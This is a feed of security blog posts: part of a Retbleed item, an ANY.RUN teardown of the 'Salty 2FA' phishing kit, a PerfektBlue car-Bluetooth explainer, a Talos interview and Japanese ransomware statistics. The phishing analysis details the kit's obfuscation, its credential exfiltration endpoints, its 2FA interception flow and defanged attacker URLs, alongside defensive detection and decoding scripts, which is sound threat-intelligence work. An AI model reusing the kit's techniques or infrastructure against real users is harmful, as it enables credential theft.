The researchers from Google were able to significantly accelerate a Retbleed attack. The key takeaway from their work is that arbitrary sections of RAM can be read at 13 KB/s. The accuracy of extracting secret data from the cache is also crucial for such attacks, and in this case it was one hundred percent. The experts demonstrated how the security systems of the operating system kernel – specifically the Linux kernel – can be bypassed. Another significant improvement they made was the use of an attack known as Speculative ROP, which they modified to evade the very same defenses designed for Spectre v2.

According to the researchers, the only limitation of their exploit is the need to know the system’s kernel configuration in advance. This isn’t a major hurdle because many systems use common, standard configurations. Even for unknown configurations, attackers can perform a preliminary analysis.

Should we expect Retbleed attacks in the wild?

Most such attacks explore a scenario where malicious code with low privileges runs on a standard computer – ultimately gaining access to sensitive data. However, the same could be said of attacks using traditional malware. If an attacker has already managed to execute arbitrary code on a system, they don’t necessarily need to resort to extremely complex methods for privilege escalation. There are often simpler ways to achieve the same result, such as exploiting a vulnerability in an application or system software.

Attacks like Spectre and Retbleed pose the greatest danger to cloud systems. For a cloud provider, it’s critically important that clients whose virtual machines share the same hardware can’t gain access to other users’ data or hypervisor information. Google’s researchers claim that this new variant of the Retbleed attack allows for exactly that. As a result, Google has stopped using servers with AMD Zen 2 architecture CPUs in its own cloud services for tasks that involve clients executing arbitrary code. So it does seem they’re taking this threat seriously.

Kaspersky official blog – ​Read More

Salty 2FA: Undetected PhaaS from Storm-1575 Hitting US and EU Industries 

Today, phishing accounts for the majority of all cyberattacks. The availability of low-cost, easy-to-use Phishing-as-a-Service (PhaaS) platforms like Tycoon2FA, EvilProxy, and Sneaky2FA only makes the problem worse. 

These services are actively maintained by their operators; new evasion techniques are regularly added, and the multi-layered infrastructure behind the phishing kits continues to evolve and expand. 

But beyond these established players in the PhaaS market, the ANY.RUN team sometimes comes across phishing campaigns that use tools unlike anything we’ve seen before. 

One such example is a framework we’ve dubbed Salty 2FA, whose execution chain and infrastructure have not previously been documented.

Like other PhaaS platforms, Salty 2FA is mainly delivered via email and focuses on stealing Microsoft 365 credentials. It unfolds in multiple stages and includes several mechanisms designed to hinder detection and analysis. 

Let’s dive deeper into how Salty 2FA works. 

Key Takeaways 

  • Salty 2FA is a newly discovered PhaaS framework, with overlaps to Storm-1575/1747 but distinct enough to stand apart. 
  • It uses a unique domain pattern (.com subdomains paired with .ru domains) and unfolds in a multi-stage execution chain designed to resist detection. 
  • The kit can bypass multiple 2FA methods (push, SMS, voice), giving attackers access beyond stolen credentials. 
  • Victims span global industries including finance, telecom, energy, consulting, logistics, and education. 
  • Static IOCs are unreliable; detection requires spotting behavioral patterns that persist across samples. 
  • ANY.RUN’s interactive sandbox was essential in mapping its execution flow and exposing its infrastructure in real time. 

Discovery of Salty 2FA 

During phishing campaign hunting, several ANY.RUN sandbox sessions were identified that had not yet been flagged as malicious. At first glance, they showed familiar traits: Cloudflare Turnstile, a fake Microsoft login page, and unknown domains. 

Check analysis sessions:  

Analysis session 1 

Analysis session 2 

Analysis of the phishkit inside ANY.RUN’s Interactive Sandbox

What stood out in these cases was the domain infrastructure. In the IOCs section of the sessions, a pattern became clear: the consistent use of compound domains in “.com” zones (e.g., .com.de, .it.com) in combination with domains registered under the .ru TLD. The phishing pages themselves also followed a recurring format, embedding “.com” subdomains within a pattern of <sub_domain>.<main_domain>.??.com. 

Suspicious domain combination 

The URI paths hosting the phishing content also appeared unusual. While they initially looked randomly generated and unrelated, further inspection suggested they might share commonalities worth examining. 

With this hypothesis in mind, a query was run in Threat Intelligence Lookup: 

domainName:"*.*.??.com$" AND domainName:".ru$" 

The results confirmed that this domain pairing is indeed a recurring element tied to phishing activity. Moreover, it highlighted that this indicator had not yet been fully integrated into the detection system, leaving a potential coverage gap. 

Hypothesis validation in ANY.RUN’s TI Lookup 

The initial results left some uncertainty. In addition to the incomplete detection coverage at the time of analysis, the sample included tasks with potential true negative verdicts, as well as tasks tagged under different categories, ranging from generic phishing labels to Tycoon and EvilProxy, campaigns that had not previously demonstrated the observed behavior (the .??.com + .ru domain combination). 

To reduce ambiguity, the query was refined with contextual filters, focusing on specific resources such as requests to Cloudflare. 

The updated TI query produced much clearer results, confirming that this activity is almost certainly tied to a distinct phishing operation. However, it cannot yet be definitively attributed to any of the known actors. 

Refined TI query: 

domainName:"*.*.??.com$" AND domainName:"a.nel.cloudflare.com" AND domainName:"challenges.cloudflare.com" AND NOT domainName:"cdnjs.cloudflare.com" AND domainName:".ru$" 

Refined TI Lookup query 
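The refined query above can be turned into a local triage rule that runs over the set of domains a sandbox session contacted. This is an added example written for this post, not ANY.RUN code; the wildcard semantics of `*`, `??` and `$` are assumed (one or more non-dot characters, exactly two characters, and an end anchor), and the session ids are constructed.

```python
import re

# Hand translation of the refined TI Lookup query (assumed wildcard semantics:
# '*' = one or more non-dot characters, '??' = exactly two characters,
# '$' = anchored at the end of the name). Note the post also reports
# .com.de-style names (e.g. frankfurtwebs.com.de); the query does not cover those.
COMPOUND_COM = re.compile(r"^[^.]+\.[^.]+\.[a-z]{2}\.com$")
REQUIRED = frozenset({"a.nel.cloudflare.com", "challenges.cloudflare.com"})
EXCLUDED = frozenset({"cdnjs.cloudflare.com"})


def normalize(domains) -> set:
    """Lower-case and strip trailing dots so set comparisons are exact."""
    return {d.strip().lower().rstrip(".") for d in domains if d.strip()}


def matches_refined_query(domains) -> bool:
    """True when a session's contacted-domain set satisfies every clause:
    a <sub>.<main>.??.com host, both Cloudflare Turnstile/NEL hosts present,
    no cdnjs.cloudflare.com load, and at least one .ru host."""
    seen = normalize(domains)
    has_compound_com = any(COMPOUND_COM.match(d) for d in seen)
    has_ru = any(d.endswith(".ru") for d in seen)
    return has_compound_com and has_ru and REQUIRED <= seen and not (EXCLUDED & seen)


def explain(domains) -> dict:
    """Per-clause breakdown, useful when tuning the rule against false positives."""
    seen = normalize(domains)
    return {
        "compound_com": sorted(d for d in seen if COMPOUND_COM.match(d)),
        "ru": sorted(d for d in seen if d.endswith(".ru")),
        "required_missing": sorted(REQUIRED - seen),
        "excluded_present": sorted(EXCLUDED & seen),
    }


def triage(sessions: dict) -> list:
    """Return the ids of sessions whose domain sets match, in input order."""
    return [sid for sid, doms in sessions.items() if matches_refined_query(doms)]


# Constructed sessions: domain names come from the post's IOC list, session ids are made up.
SAMPLE_SESSIONS = {
    "task-A": ["telephony.nexttradeitaly.it.com", "a.nel.cloudflare.com",
               "challenges.cloudflare.com", "marketplace24ei.ru"],
    # same chain plus a cdnjs load, which the NOT clause filters out
    "task-B": ["telephony.nexttradeitaly.it.com", "a.nel.cloudflare.com",
               "challenges.cloudflare.com", "cdnjs.cloudflare.com", "marketplace24ei.ru"],
    # Turnstile on an ordinary site, no .ru host at all
    "task-C": ["login.example.com", "a.nel.cloudflare.com", "challenges.cloudflare.com"],
}

if __name__ == "__main__":
    for sid in triage(SAMPLE_SESSIONS):
        print(sid, explain(SAMPLE_SESSIONS[sid]))
```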

After a quick review of the external indicators, the next step was to examine the client-side code used in this phishing campaign to better understand its functionality and capabilities. 

Technical Deep Dive: Execution Chain 

To capture decrypted traffic and analyze the payload step by step, a similar session was rerun with the MITM proxy enabled. 

Check analysis session with MITM enabled 

Analysis of a phishing page inside ANY.RUN’s Interactive Sandbox

When the page loads from parochially[.]frankfurtwebs[.]com[.]de, a small “trampoline” JavaScript executes. It initializes the Cloudflare Turnstile widget, runs the associated checks, and returns a cf_response token. After that validation, the server delivers the HTML that initiates the main execution chain. 

Stage 1: Obfuscated Entry Script 

The source code contains comment inserts with inspiring quotes. These do not affect functionality but act as filler “noise,” making static analysis more challenging. 

A small JavaScript snippet contains an obfuscated function designed to decode the address of the next stage, retrieve it, decode it in the same way, and then write the result into the DOM of the current page. 

Stage 1: obfuscated code 

Decoding the value lPwICAQHzsPDAfUG//kIBAD19/nGyPn9wgYJw8M= reveals the URL of the next payload: 
hxxps[://]marketplace24ei[.]ru// 

Stage 2: Encrypted Payload and Fake Login Page 

After loading and decoding the payload, the result is a large HTML page—again padded with non-functional “noise” just like the previous stage—with an obfuscated JavaScript snippet at the end. 

Fragment of Stage 2 payload 

A quick search through the HTML for <input> tags revealed several matches. One stood out: 

<input hidden id="lessen" value="aHR0cHM6Ly9tYXJrZXRwbGFjZTI0ZWkucnUvNzkwNjI4LnBocA"> 

Decoding the Base64 value exposes another URL that becomes relevant later: 

hxxps[://]marketplace24ei[.]ru/790628[.]php 

Comparing the HTML source to the session’s runtime behavior also shows that the attacker obfuscates the page text itself. For example, the string: 

“Because you’re accessing sensitive info, you need to verify your password.” 

appears obfuscated in the code rather than in plain text. 

Source code of the fake Microsoft login page 
What the victim sees in the browser 

Stage 3: Client-Side Logic and Anti-Analysis Mechanisms 

All of the logic for switching between page states, as well as the collection and exfiltration of user input, is handled by the previously mentioned JavaScript code. 

After deobfuscating this script, we can walk through its key technical details and capabilities. 

To begin with, nearly all of the front-end logic relies on calls to page elements through jQuery. The identifiers for these elements are generated dynamically, making analysis more difficult. In addition, the element IDs themselves are encoded using a combination of Base64 and XOR with a fixed generated value, which must be decoded through a dedicated routine. 

Procedure for decoding page element IDs 
Managing web page elements with jQuery (decoded values) 

The phishing payload also includes several basic defense mechanisms commonly seen in such campaigns: 

  • Blocking keyboard shortcuts that open debugging tools (e.g., DevTools). 
  • Measuring execution time when a debugger is triggered and halting further activity if a delay is detected, which may indicate the code is running in a controlled or lab environment. 

For exfiltration of the victim’s input, the data is “encrypted” using the same Base64 + XOR technique. This time, however, the key parameter is derived from the victim’s session identifier. 

Stage 4: Data Exfiltration and Server Interaction 

The stolen data is sent to servers using .ru domains from the observed cluster, with endpoints following the format: 

/<5-6_digits>.php 

The data itself is encoded and placed in the request= parameter of the POST request, while the decoding key (along with the victim’s session ID) is stored in the session= parameter. 

Encoding procedure for exfiltrated data using the session key 

Using a POST request captured in the session as an example, the data can be examined by applying the same encoding routine in reverse: 

POST request containing stolen data 

Utilize the following CyberChef recipe to decode the data: https://gchq.github.io/CyberChef/#recipe=URL_Decode(true)From_Base64(%27A-Za-z0-9%2B/%3D%27,true,false)XOR(%7B%27option%27:%27UTF8%27,%27string%27:%27b17be01b20c089141058415728fd66ff%27%7D,%27Standard%27,false)&input=R1JOWUVrY0tFeFpBUlFZU0ZCdFVXUk1LRjFWZFdsQjNVMW9GU2xWWkMwUWY&oeol=VT

Example of decrypted stolen data 
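The CyberChef recipe above can be reproduced offline so that captured exfiltration requests can be decoded and labeled in bulk during incident review. This is an added example written for this post, not ANY.RUN code: the key and request value are those embedded in the post's recipe; the opcode-to-state mapping is transcribed from the state table in the Stage 5 section; and since the post does not describe the layout of the session= parameter, the key is passed in explicitly.

```python
import base64
import re
from urllib.parse import quote, unquote

# Key and request= value copied from the CyberChef recipe quoted in the post.
SAMPLE_KEY = "b17be01b20c089141058415728fd66ff"
SAMPLE_REQUEST = "GRNYEkcKExZARQYSFBtUWRMKF1VdWlB3U1oFSlVZC0QF"

# "op" value -> page state, transcribed from the post's state table.
OPCODES = {
    "true": "state #2: email submitted",
    "bk": "state #3: 'Stay signed in'",
    "ne": "state #5: 2FA initiated",
    "ver": "state #6: 2FA method chosen",
}
# "service" codes sent with op "Vx" (states 6.1 to 6.6 in the table).
VX_SERVICES = {
    "a": "6.1 Phone App Notification 2FA",
    "c": "6.2 Phone App OTP 2FA",
    "b": "6.3 OneWaySMS 2FA",
    "d": "6.4 TwoWayVoiceMobile 2FA",
    "e": "6.5 TwoWayVoiceOffice 2FA",
    "o": "6.6 Companion Apps Notification 2FA",
}


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR with a repeating key (CyberChef's 'Standard' XOR scheme)."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_request(request_value: str, key: str) -> bytes:
    """Reverse the kit's encoding: URL-decode, Base64-decode, XOR with the
    session key. Base64 padding is restored in case the kit stripped it
    (the post's sample carries none)."""
    b64 = unquote(request_value)
    b64 += "=" * (-len(b64) % 4)
    return xor_bytes(base64.b64decode(b64), key.encode("utf-8"))


def encode_request(plaintext: bytes, key: str) -> str:
    """Forward direction, used here only to round-trip check the decoder."""
    b64 = base64.b64encode(xor_bytes(plaintext, key.encode("utf-8"))).decode()
    return quote(b64.rstrip("="), safe="")


def classify(decoded: bytes) -> str:
    """Map a decoded message to the page state it was sent from, using the
    'op' and 'service' fields. Regexes rather than json.loads, because a
    captured payload may be truncated: the post's own sample decodes to the
    expected {"op":"true","em":...} structure but ends in a stray byte
    instead of a closing brace."""
    text = decoded.decode("utf-8", errors="replace")
    op = re.search(r'"op"\s*:\s*"([^"]*)"', text)
    if not op:
        return "unknown: no op field"
    if op.group(1) == "Vx":
        svc = re.search(r'"service"\s*:\s*"([^"]*)"', text)
        code = svc.group(1) if svc else ""
        return VX_SERVICES.get(code, f"state #6.x: unknown service {code!r}")
    return OPCODES.get(op.group(1), f"unknown op {op.group(1)!r}")


def decode_post_body(body: str, key: str) -> bytes:
    """Extract request= from a captured form-encoded POST body and decode it.
    The key travels in session= per the post, but its layout is not given,
    so the caller supplies it."""
    fields = dict(p.split("=", 1) for p in body.split("&") if "=" in p)
    if "request" not in fields:
        raise ValueError("no request= parameter in body")
    return decode_request(fields["request"], key)


if __name__ == "__main__":
    msg = decode_request(SAMPLE_REQUEST, SAMPLE_KEY)
    print(msg.decode("utf-8", errors="replace"))
    print(classify(msg))
```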

Stage 5: Multi-State 2FA Handling 

In response to the POST request, the server returns a JSON object. The value of the response field depends on the current state of the phishing page; that is, on which opcode was specified when the data was submitted. 

Analysis of the code revealed several possible states of the phishing page, along with the data structures transmitted to the attacker as the page transitions between these states. 

The identified states are as follows: 

State # | State Name | Function | Trigger | Data Sent (decoded) | Data Received (decoded) 
1 | Initial state | Prompts victim to enter email | When the phishing login page first loads | n/a | n/a 
2 | Switch to password page state | Prompts for password | When the victim enters a valid email | {"op":"true","em":} | {"status":, "banner":, "background":, "boilerPlateText":, "token":, "ho":} 
3 | Switch to "Stay signed in" state | Prompts "Stay signed in?" | When the victim enters a valid password | {"op":"bk"} | n/a 
4 | Switch to "Incorrect password" state | Prompts "Account locked / incorrect password" | When the victim enters an empty or invalid password | n/a | n/a 
5 | Switch to "2FA" state | Initiates 2FA handling | When the victim's account has 2FA enabled | {"op":"ne","em":,"px":,"sec":} | {"status":, "sec":, "method":, "token":} 
6 | Switch to "Process 2FA method" state | Processes the chosen 2FA method | After state #5 | {"m":,"token":,"op":"ver","sec":} | {"status":, "type":, "otp":, "token":} 
6.1 | Phone App Notification 2FA | Handles phone app push notifications | After state #6 | {"op":"Vx","token":,"service":"a","sec":} | {"status":} 
6.2 | Phone App OTP 2FA | Handles OTP from phone app | After state #6 | {"op":"Vx","token":,"service":"c","otc":,"sec":} | {"status":, "newToken":} 
6.3 | OneWaySMS 2FA | Handles one-way SMS OTP | After state #6 | {"op":"Vx","token":,"service":"b","otc":,"sec":} | {"status":, "newTokenn":} 
6.4 | TwoWayVoiceMobile 2FA | Handles mobile voice call 2FA | After state #6 | {"op":"Vx","token":,"service":"d","sec":} | {"status":, "calltoken":} 
6.5 | TwoWayVoiceOffice 2FA | Handles office phone voice call 2FA | After state #6 | {"op":"Vx","token":,"service":"e","sec":} | {"status":, "newtokenoff":} 
6.6 | Companion Apps Notification 2FA | Handles companion app push notifications | After state #6 | {"op":"Vx","token":,"service":"o","sec":} | {"status":} 
Code snippet handling the 2FA authentication method 

Capabilities and Evasion Techniques 

Based on the complexity of its infrastructure, such as the use of multiple domains across specific TLDs, including a dedicated domain for data exfiltration, the presence of evasion techniques, and its extensive functionality (credential validation, handling multiple 2FA methods, and intercepting OTP codes), this campaign appears to represent a new PhaaS framework. Its behavioral patterns differ from those of the major players in the phishing ecosystem, such as Tycoon, EvilProxy, and others. 

Is it Storm-1575 or Storm-1747? 

At the time of initial research, no clear evidence was found to indicate who operates or develops this phishing kit, how the attackers obtain access (e.g., whether they purchase software), or any distinctive technical traits that would link it to other known kits. 

After updating detection methods and re-hunting indicators in the ANY.RUN Sandbox and TI, some overlap in IOCs (specifically domains) emerged with activity tracked as Storm-1575 and Storm-1747. 

Storm-1575 is associated with the PhaaS platform Dadsec and is presumed to be its developer. However, Dadsec activity has not been observed recently, and attribution boundaries for Storm-1575 remain unclear. 

Storm-1747, on the other hand, is well known for Tycoon 2FA—a state-of-the-art phishing kit that has ranked among the most active in terms of both attacks and related samples for several years. That said, Tycoon relies on a different infrastructure (mainly es-ru-es domain chains) and implements distinct client-side code, including its obfuscation and exfiltration techniques. 

To track and assess this phishing activity, the framework was designated Salty 2FA, a name inspired by its “salted” payloads, which consistently helped distinguish its code from other kits during analysis. More importantly, a unique threat name was required, one easier to work with than YetAnotherPhishkitActivity2FA, and “Salty 2FA” struck the right balance of clarity and memorability. 

Check potential overlaps between Salty 2FA and Storm-1575/1747 

Salty 2FA Targets and Activity Timeline 

Analysis of phishing emails, their content themes, and pre-filled victim email addresses (automatically inserted via the #email anchor in URLs) made it possible to identify the targets of this campaign, including affected countries and industries. 

Observed targets include: 

Country / Region of the Organization  Industry 
USA / Worldwide (India)  Metallurgy 
USA / LATAM  Financial 
Greece  Telecom 
Germany / Worldwide  Chemicals / Polymers 
Spain  Energy (solar panels) 
Spain  Energy 
USA  Real estate development 
Switzerland / Worldwide  Logistics 
USA  Healthcare 
USA  Financial 
USA  IT consulting / Staffing 
USA  Environmental services 
Canada / France  IT 
USA  Government 
UK / Worldwide  Consulting / Financial 
Italy  Industrial (packaging, automation) 
UK  Construction / Infrastructure 
USA / Worldwide  Logistics 
USA / Worldwide  Logistics 
USA  Oil and gas 
USA  Financial / Insurance 
UK  Real estate 
USA  Chemicals / Packaging 
USA  Consulting / Financial 
USA  Data management / Storage 
USA  Automotive accessories 
USA  Construction / Contractors 
USA  Education 
USA  Financial 

Common phishing email lures included: 

  • “Voice message was left…” 
  • “Access full document…” 
  • “Payroll amendment…” 
  • “Request for Proposal…” 
  • “Bid invitation…” 
  • “Billing Statement…” 

Additional IOCs extracted from SPF records in email headers: 

  • 153[.]127[.]234[.]4 
  • 51[.]89[.]33[.]171 
  • 191[.]96[.]207[.]129 
  • 153[.]127[.]234[.]5 
  • izumi[@]yurikamome[.]com 

Activity timeline: 

Based on data from the ANY.RUN Sandbox and TI, activity resembling Salty 2FA began gaining momentum in June 2025, although it is possible that early or “raw” variants of the kit, or samples similar to it, were already being deployed as early as March–April 2025. 

Confirmed activity attributed to Salty 2FA has been observed since late July 2025 and continues to this day, generating dozens of new public analysis sessions in the Sandbox every day. 

How to Spot Salty 2FA 

Basic indicators such as domain names (hashes are not applicable here due to constant obfuscation and code mutation) can be useful for threat hunting and expanding the threat landscape. In some cases, they may even lead to detections. However, for phishing kits like Salty 2FA, these indicators are generally unreliable for long-term or consistent detection. 

Threat detection specialists and engineers instead need to identify behavioral patterns that remain consistent across samples, even when those samples appear completely different at first glance. 

Any recurring clue, whether it is a particular chain of TLD zones in domain names, distinctive URL structures, unusual web page headers, or a characteristic set of resources loaded from legitimate CDNs, contributes to the behavioral profile of a PhaaS framework. These recurring traits allow analysts to track and detect it over time without relying on volatile details such as email hashes or specific phishing domains. 

Detect and Distinguish Similar Emerging Threats in Seconds 

With solutions like ANY.RUN’s Interactive Sandbox, analysts can observe phishing kits in real time, uncover hidden behaviors, and distinguish between similar frameworks. By focusing on behavioral patterns rather than fragile indicators, it becomes possible to track evolving PhaaS activity more reliably, while also enjoying a smoother, less resource-heavy investigation process. 

  • Real-time visibility into phishing execution chains and payload delivery. 
  • IOC enrichment with domains, infrastructure elements, and threat behavior insights linked to wider campaigns. 
  • Faster investigations with reduced manual workload and clearer insights. 
  • Seamless collaboration between analysts through shared interactive sessions. 

Conclusion 

The ecosystem of Phishing-as-a-Service (PhaaS) platforms is constantly evolving. Existing kits adapt their attack methods, while new players emerge, some entirely brand-new, others reimagined versions of tools once used by well-known threat actors. 

The analyzed framework, Salty 2FA, shares certain traits with Storm-1575, the group behind the Dadsec platform. However, a deeper examination revealed too many unique characteristics to reliably attribute it to any of the known threats, such as Tycoon2FA, Sneaky2FA, Mamba2FA, Gabagool, or EvilProxy. 

With its ability to distribute phishing payloads at scale, maintain dynamic infrastructure, intercept and process most known 2FA authentication methods beyond simple credentials, and manage a complex communication model between phishing pages and C2 servers, Salty 2FA stands on par with the “major” kits in today’s phishing landscape. 

For SOC teams triaging phishing-related incidents, it is critical to quickly and accurately confirm the malicious nature of collected artifacts and correlate them with the threat actor likely to be targeting their organization. 

ANY.RUN’s Interactive Sandbox enables security professionals worldwide to detect and analyze threats like Salty 2FA by replicating victim interactions and tracking execution chains in real time, while leveraging behavior-based detection to expose previously unknown samples and indicators. 

Try It Yourself 

See how Salty 2FA and other emerging phishing kits unfold in real time. ANY.RUN’s Interactive Sandbox lets you safely detonate samples, follow execution chains, and uncover hidden IOCs in seconds. 


Gathered IOCs 

Domains 

  • innovationsteams[.]com 
  • marketplace24ei[.]ru 
  • nexttradeitaly[.]it[.]com 
  • frankfurtwebs[.]com[.]de 

URLs

  • hxxps[://]telephony[.]nexttradeitaly[.]com/SSSuWBTmYwu/ 
  • hxxps[://]parochially[.]frankfurtwebs[.]com[.]de/ps6VzZb/ 
  • hxxps[://]marketplace24ei[.]ru// 
  • hxxps[://]marketplace24ei[.]ru/790628[.]php 


Sandbox Sessions 

https://app.any.run/tasks/91e777dd-603b-47e4-ad8f-96e8bddf2cba

https://app.any.run/tasks/7d8e3a4d-5226-40b9-9e94-0f833c784abc

https://app.any.run/tasks/a601b5c4-c178-4a8e-b941-230636d11a1c

TI Lookup Search Queries 

https://intelligence.any.run/analysis/lookup#{%22query%22:%22domainName:%5C%22*.*.??.com$%5C%22%20AND%20domainName:%5C%22challenges.cloudflare.com%5C%22%20AND%20NOT%20domainName:%5C%22cdnjs.cloudflare.com%5C%22%20AND%20domainName:%5C%22code.jquery.com%5C%22%20AND%20domainName:%5C%22.ru$%5C%22%22,%22dateRange%22:180}

https://intelligence.any.run/analysis/lookup#{%22query%22:%22threatName:%5C%22salty2fa%5C%22%22,%22dateRange%22:180}

https://intelligence.any.run/analysis/lookup#{%22query%22:%22threatName:%5C%22salty2fa%5C%22%20AND%20threatName:%5C%22storm*%5C%22%22,%22dateRange%22:180}

The post Salty 2FA: Undetected PhaaS from Storm-1575 Hitting US and EU Industries  appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

Protecting your car against the PerfektBlue vulnerability in Bluetooth | Kaspersky official blog

Cars these days are effectively computers on wheels — making them targets for cybercriminals: theft, unauthorized activation of on-board equipment, remote braking and steering, and spying on drivers and passengers are all perfectly doable by the bad guys. But carrying out such attacks often requires either physical access to the vehicle or remote access to its telematics systems (that is, hijacking communications with the carmaker’s server over the cellular network). However, a recent study by PCA Cyber Security describes a new hacking method that targets the car’s infotainment system via Bluetooth. The four vulnerabilities in question — collectively named PerfektBlue — are unlikely to lead to widespread car thefts or hacks, but it’s still worth knowing about them and exercising caution.

Under the hood of PerfektBlue

If your car was made within the last 10 years, no doubt it lets you connect your smartphone via Bluetooth to make hands-free calls or listen to music. The infotainment system is a part of the head unit, and it uses a built-in Bluetooth chip and special software to work. The software of choice for many carmakers is OpenSynergy Blue SDK. According to its developers, Blue SDK is used in 350 million vehicles made by Ford, Mercedes-Benz, Skoda, Volkswagen, and others.

PCA Cyber Security discovered four vulnerabilities in Blue SDK (CVE-2024-45431, CVE-2024-45432, CVE-2024-45433, CVE-2024-45434) which, when chained together, allow an attacker to run malicious code on the head unit. To do so, they need to be connected to the car via Bluetooth, which means pairing a device. Once paired, the attacker sends malformed commands to the car over the Audio/Video Remote Control Profile (AVRCP). These trigger an error in the head unit’s software and give the attacker code execution with the same privileges as the carmaker’s own Bluetooth software. With those privileges, the attacker can theoretically track the vehicle’s location, eavesdrop through the car’s built-in microphones, and steal data from the head unit, such as the victim’s address book. Depending on the car’s digital architecture, the CAN bus that links the electronic control units (ECUs) may also be reachable from the head unit, which would let an intruder interfere with essential functions such as braking.

Practical questions about PerfektBlue

How to spot and prevent this attack? It depends on how Bluetooth is implemented in your particular vehicle. In some rare cases, the in-car infotainment system does not require any driver or passenger confirmation at all, leaving Bluetooth open to third-party connections; if so, there is no way to stop an attack. Most cars, however, require the driver to confirm a connection to a new device, so the driver will see an unexpected pairing request, and if it is denied the attack fails. Some cars go further and automatically reject connections unless the driver has explicitly enabled pairing mode in the settings; if that applies to your car, attackers have a much harder job.

How to determine if your car is vulnerable? Unfortunately, makers tend not to disclose information about vehicle components, let alone the software inside them. The only reliable way is therefore to contact a branded dealer or specialized car service, where they can check the head unit and advise on whether new firmware is available that eliminates the vulnerabilities. The researchers themselves successfully exploited the vulnerabilities on the head units of a Volkswagen ID.4 (MEB ICAS3 infotainment system), a Mercedes-Benz (NTG6) and a Skoda Superb (MIB3).

How to protect your car and yourself? The best advice is to update the head unit firmware to a patched version. Although OpenSynergy released software updates back in September 2024, these must first be applied by the manufacturer of the head unit, and only then by the carmaker. The latter must also distribute the new firmware across its dealer network. Therefore, some vulnerable cars may still be lacking new firmware.

The second reliable method of protection is to disable in-car Bluetooth.

What’s the attack range? With standard Bluetooth hardware, the attack range is limited to 10 meters, but special amplifiers (range extenders) can extend this to 50–100 meters. If a vehicle is equipped with 4G cellular network technology, then after the first phase of the attack, which requires Bluetooth, threat actors can theoretically maintain control over the car via the cellular network.

Is it true the engine must be on for the attack to work? This limitation was reported by Volkswagen, but in practice almost all cars allow you to turn on the infotainment system together with Bluetooth while the ignition is off. Therefore, a running engine is not an attack precondition.

What should carmakers do to improve protection against such attacks? Car manufacturers should adopt the Secure by Design approach. Kaspersky, together with manufacturers of head units and automotive electronics, is creating a line of Cyber Immune solutions based on KasperskyOS that keep the system protected and running even if a vulnerable component is attacked. But given the long development and testing cycles in the automotive industry, it will be several more years before Cyber Immune cars hit the roads.

More case studies of car hacking through vulnerabilities in electronic systems:

Kaspersky official blog – ​Read More

JJ Cummings: The art of controlling information

Welcome to the second episode of Humans of Talos, our ongoing video interview series that celebrates the people powering Cisco’s threat intelligence efforts. In each episode, we dive deep into the personal journeys, motivations and lessons learned from the team members who help keep the internet safe. This episode, let’s meet JJ Cummings, who leads our Threat Intelligence and Interdiction team, focusing on nation-state security and intelligence. Read (or watch) on for JJ’s story, his thoughts on burnout and motivation, and advice for anyone looking to join Talos.

Amy Ciminnisi: Hello and welcome to the second episode of Humans of Talos. I’m here with JJ Cummings today, who leads a team on our Threat Intelligence and Interdiction team, focused on nation state security and intelligence matters. What led you to your role at Talos?

JJ Cummings: Prior to Talos’ formal formation, or creation, I was a part of the Sourcefire acquisition, and I was a part of Sourcefire for many years. We helped with deep investigations and analysis and incident response and threat hunting. Then that moved into the Cisco world when Cisco acquired us. We determined that there was kind of the need for a Threat Intelligence team. There was an opportunity for me to come over to start to build out the capabilities and the path forward with Matt Olney, Ryan Pentney and several others. From there, the Threat Intelligence and Interdiction team grew to what it is today.

AC: What is something about your day to day role at Talos that people might be particularly surprised by or interested in?

JC: One of the challenges when we’re working with a lot of different partners is how we control the information. Some partners tell us, “Hey, we want feedback, but you can’t tell anybody else,” which is really difficult. We take that information and we try to identify our own ways to point to how we identified it so it doesn’t burn that partner. We have to find ways to highlight things in unattributable or alternatively attributable ways. But the good news is that I’ve got an amazing team behind me. They’re force multipliers and they are beasts when it comes to getting the job done.


Want to see more? Watch the full interview, and don’t forget to subscribe to our YouTube channel for future episodes of Humans of Talos!

Cisco Talos Blog – ​Read More

Ransomware incidents in Japan during the first half of 2025

  • In the first half of 2025, the number of ransomware attacks in Japan increased by approximately 1.4 times compared to the previous year.
  • Ransomware attackers continue to primarily target small and medium-sized enterprises in Japan. The most affected industry remains manufacturing, unchanged from last year.
  • The ransomware group causing the most damage in Japan is “Qilin.”
  • In late June, a new ransomware group called “Kawa4096” emerged and might have attacked two Japanese companies.

Victimized companies

Figure 1 summarizes the ransomware incidents involving Japanese domestic companies, including overseas branches and subsidiaries, from January 1 to June 30, 2025. According to the Cisco Talos investigation, there were 68 ransomware cases affecting organizations in Japan during this period. Sources include Cisco telemetry, official statements from affected companies, news reports and data from ransomware leak sites. Compared to 48 cases during the same period last year, this represents an approximately 1.4-fold increase. The number of incidents per month ranged from a minimum of 4 to a maximum of 16, with an average of about 11 ransomware attacks per month.

Figure 1. Ransomware incidents in Japan during the first half of 2025.

The industries affected remain largely unchanged from the same period last year, with the manufacturing sector experiencing the highest number of incidents at 18.2%, followed by the automotive sector with 5 cases (5.7%), and trading companies, construction and transportation each reporting 4 cases (4.6%).

Figure 2. Number of victim organizations by industry.

Regarding the size of the affected organizations, those with capital of less than 100 million yen (or ¥) accounted for the largest share at 38%, followed by those with capital from ¥100 million – 1 billion at 31%. In total, organizations with capital under ¥1 billion made up 69% of all cases, indicating that attackers continue to primarily target small and medium-sized enterprises (see Figure 3).

Figure 3. Classification of victim organizations by capital size.

Types of ransomware most frequently involved in incidents

LockBit and 8base, which were among the most frequently observed ransomware groups in Japan during the first half of FY2024, ceased their activities following takedown operations by law enforcement in February 2024 and February 2025 respectively, as publicly announced in press releases. As a result, neither group has been observed in 2025.

RansomHub and Hunters International, which ranked among the top ransomware groups last year, are confirmed to still be active in Japan. Notably, the ransomware group Qilin, which had not been reported to have caused any damage in Japan in FY2024, emerged as the most active group in the first half of FY2025, with eight confirmed victim organizations in the country. Qilin has been active since October 2022 and is one of the ransomware groups exerting significant influence both domestically and internationally. The findings from this investigation further suggest that Qilin’s activity is intensifying, making it one of the most critical groups to watch.

